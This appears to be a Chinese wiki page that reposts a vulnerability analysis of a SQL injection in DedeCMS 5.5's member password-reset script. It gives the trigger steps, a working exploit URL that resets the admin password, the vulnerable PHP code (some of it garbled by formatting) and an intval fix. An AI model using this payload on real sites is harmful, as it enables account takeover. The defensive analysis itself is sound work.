词条信息

xiazaiwo
xiazaiwo
进士
词条创建者 发短消息   

相关词条

热门词条

更多>>
什么是端口?到底是做什么的呢?
端口一般指两种,一种是硬件比如路由器或者交换机的插网线的端口,一种是软件的逻辑的概念,比如http的80端口!...
7种进阶方法让你快速测试端口连通性
Ping是Windows、Linux和Unix系统下的一个检查网络连通性的命令工具,对于大部分互联网用户来说很...
电脑开机,总需要按F1,是什么原因造成的?
一.主板掉电这个说法是行业内的叫法了,一般是主板的CMOS电池没电了导致的。也是最常见的一种提示你按F1的提示...
社保降费对个人有什么影响?
下调城镇职工基本养老保险单位缴费比例是政府给企业发的一个大红包,特别是对于企业来说是一个利好,但是对个人来说有...
车辆“出险”对下年保费的影响,到底有多大?
【出险对交强险的影响】【出险对商业险的影响】车辆“出险”对下年保费的影响,到底有多大?这里有必要先提下车险第三...

精选图集

更多>>
简易百科旧版 >>所属分类 >> DEDECMS    经验技巧   

DEDECMS /MEMBER/RESETPASSWORD.PHP SQL

标签: 暂无标签

顶[0] 发表评论(0) 编辑词条

CATALOG

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

DEDEcms SQL注入漏洞导致可以修改任意用户密码

2. 漏洞触发条件

1. 注册一个用户
2. 找回密码,选择通过安全问题取回: http://localhost/dedecms5.5/member/resetpassword.php3. 填写完毕信息之后点击确认
4. 然后点击确认,会跳转到这样一个URL上: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7
//黑客就可以构造EXP如下 http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx” or userid=”admin” and “2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222
//把上面url中的2改成之前跳转到链接的id参数,然后把key也改成之前跳转的链接的key参数
//然后userid可以修改成你需要修改密码的用户: admin
//pwd和pwdok就是需要修改成的密码必须保持一样: md5(111222)=00b7691d86d96aebd21dd9e138f90840

修改成功

RELEVANT LINK:

http://www.wooyun.org/bugs/wooyun-2010-042167

3. 漏洞影响范围

4. 漏洞代码分析

 

/member/resetpassword.php

..
elseif($dopost 
== "getpasswd")
{

//修改密码 if(empty($id))
{
ShowMsg(
"对不起,请不要非法提交","login.php");
exit();
}

//只匹配出了所有的数字 $mid = ereg_replace("[^0-9]","",$id);
$row 
= $db->GetOne("Select * From dede_pwd_tmp where mid = “$mid”");
if(empty($row))
{
ShowMsg(
"对不起,请不要非法提交","login.php");
exit();
}

if(empty($setp))
{
$tptim
= (60*60*24*3);
$dtime 
= time();
if($dtime – $tptim > $row[mailtime])
{
$db
->executenonequery("DELETE FROM `dede_pwd_tmp` WHERE `md` = “$id”;");
ShowMsg(
"对不起,临时密码修改期限已过期","login.php");
exit();
}
require_once(dirname(__FILE__).
"/templets/resetpassword2.htm");
}

//攻击poc进入这个流支 elseif($setp == 2)
{

if(isset($key))
{
$pwdtmp 
= $key;
}
$sn 
= md5(trim($pwdtmp));
if($row[pwd] == $sn)
{

if($pwd != "")
{

if($pwd == $pwdok)
{
$pwdok 
= md5($pwdok);
$sql 
"DELETE FROM `dede_pwd_tmp` WHERE `mid` = “$id”;";
$db
->executenonequery($sql);
//$id没有经过任何过滤就带入了SQL查询,导致了update注入 $sql = "UPDATE `dede_member` SET `pwd` = “$pwdok” WHERE `mid` = “$id”;";
if($db->executenonequery($sql))
..

5. 防御方法

/member/resetpassword.php

/* 对$id变量进行规范化 */
$id = isset($id)? intval($id) : 0;
/* */

6. 攻防思考

COPYRIGHT (C) 2015 LITTLEHANN ALL RIGHTS RESERVED

 

 

参考资料
[1].  DEDECMS /MEMBER/RESETPASSWORD.PHP SQL   http://www.xiazaiwo.net/tech/cms/15605.html

附件列表


按字母顺序浏览:A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

→我们致力于为广大网民解决所遇到的各种电脑技术问题
 如果您认为本词条还有待完善,请 编辑词条

上一篇解决织梦会员找回密码时提示临时密码
下一篇dedecms管理员密码重置工具radminpass.php

0
1. 本站部分内容来自互联网,如有任何版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
2. 本站内容仅供参考,如果您需要解决具体问题,建议您咨询相关领域专业人士。
3. 如果您没有找到需要的百科词条,您可以到百科问答提问或创建词条,等待高手解答。

关于本词条的提问

查看全部/我要提问>>